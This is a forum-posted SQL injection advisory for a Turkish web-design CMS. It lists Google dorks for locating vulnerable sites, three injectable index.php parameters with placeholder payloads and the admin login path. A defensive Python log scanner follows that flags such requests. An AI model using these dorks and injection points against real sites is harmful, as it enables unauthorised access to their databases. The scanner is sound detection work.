Topic: BirWebMaster AsmWebSitesi Graphics Web Design SQL Inj
KingSkrupellos
Comment: #1
BirWebMaster AsmWebSitesi Graphics Web Design SQL Inj
30.06.2018 16:13
#################################################################################################

# Exploit Title : BirWebMaster AsmWebSitesi Graphics Web Design Services SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/06/2018
# Vendor Homepage : asmwebsitesi.net ~ birwebmaster.net
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dorks :

inurl:''/index.php?sayfa=DuyuruOku''

intext:''Asmwebsitesi.net Asm Web Sitesi''

intext:''BirWebMaster Web Tasarım Hizmetleri''

# Exploits :

/index.php?sayfa=DuyuruOku&id=[SQL Inj]

/index.php?sayfa=SayfaOku&SayfaId=[SQL Inj]

/index.php?sayfa=Galeri&islem=ResimGoster&id=[ID-NUMBER]&page=[SQL Inj]

# Admin Login Panel Path : /admin/index.php

#################################################################################################

# Example Vulnerable SQL Sites =>


[ Proof of Concept for SQL Inj ] => archive.is/Jvfcu

# SQL Database Error =>

Warning: session_start(): Cannot send session cache limiter - headers already sent
(output started at /home/cumasm/public_html/index.php:1) in /home/cumasm/public_html/db.php on line 7

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# There is an organ in the human body. If it is healthy, the whole body is healthy;
if it is corrupted, the whole body is corrupted. Beware! It is the heart.
[ Hz.Muhammed S.A.V ] #

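As an added example from the defender's side (not part of the original post or of the affected application): a small Python scanner over constructed Apache-style access log lines that flags requests to the three `index.php` pages named in the advisory whose identifier parameters (`id`, `SayfaId`, `page`) are not plain integers, decoding once more after query parsing so a double-encoded quote is not missed. The sample log lines, client addresses and the `LOG_RE` log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Pages from the advisory and the parameters the application should treat
# as numeric identifiers; anything else in them deserves a look.
NUMERIC_PARAMS = {
    "DuyuruOku": ("id",),
    "SayfaOku": ("SayfaId",),
    "Galeri": ("id", "page"),
}

# Assumed Common Log Format: client ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Constructed sample log (not real traffic); only the %27 payload shape from the advisory
# is used, once plain and once double-encoded (%2527).
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Jun/2018:16:13:01 +0300] "GET /index.php?sayfa=DuyuruOku&id=2 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [30/Jun/2018:16:13:07 +0300] "GET /index.php?sayfa=DuyuruOku&id=2%27 HTTP/1.1" 200 812',
    '198.51.100.9 - - [30/Jun/2018:16:14:20 +0300] "GET /index.php?sayfa=Galeri&islem=ResimGoster&id=4&page=1%2527 HTTP/1.1" 200 7731',
    '198.51.100.9 - - [30/Jun/2018:16:15:00 +0300] "GET /index.php?sayfa=SayfaOku&SayfaId=3 HTTP/1.1" 200 4200',
]

def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, method, target, status = m.groups()
    return {"client": client, "time": ts, "method": method, "target": target, "status": int(status)}

def suspicious_params(target):
    """Return (page, param, decoded_value) for every numeric parameter of a known page
    whose fully decoded value is not a plain integer."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)  # decodes %XX once
    page = qs.get("sayfa", [None])[0]
    hits = []
    for param in NUMERIC_PARAMS.get(page, ()):
        for once_decoded in qs.get(param, []):
            value = unquote(once_decoded)  # second pass catches double-encoded payloads
            if not re.fullmatch(r"\d+", value):
                hits.append((page, param, value))
    return hits

def scan(lines):
    """Run the check over log lines; returns (client, page, param, value) per finding."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for page, param, value in suspicious_params(rec["target"]):
            findings.append((rec["client"], page, param, value))
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print("suspicious:", f)
```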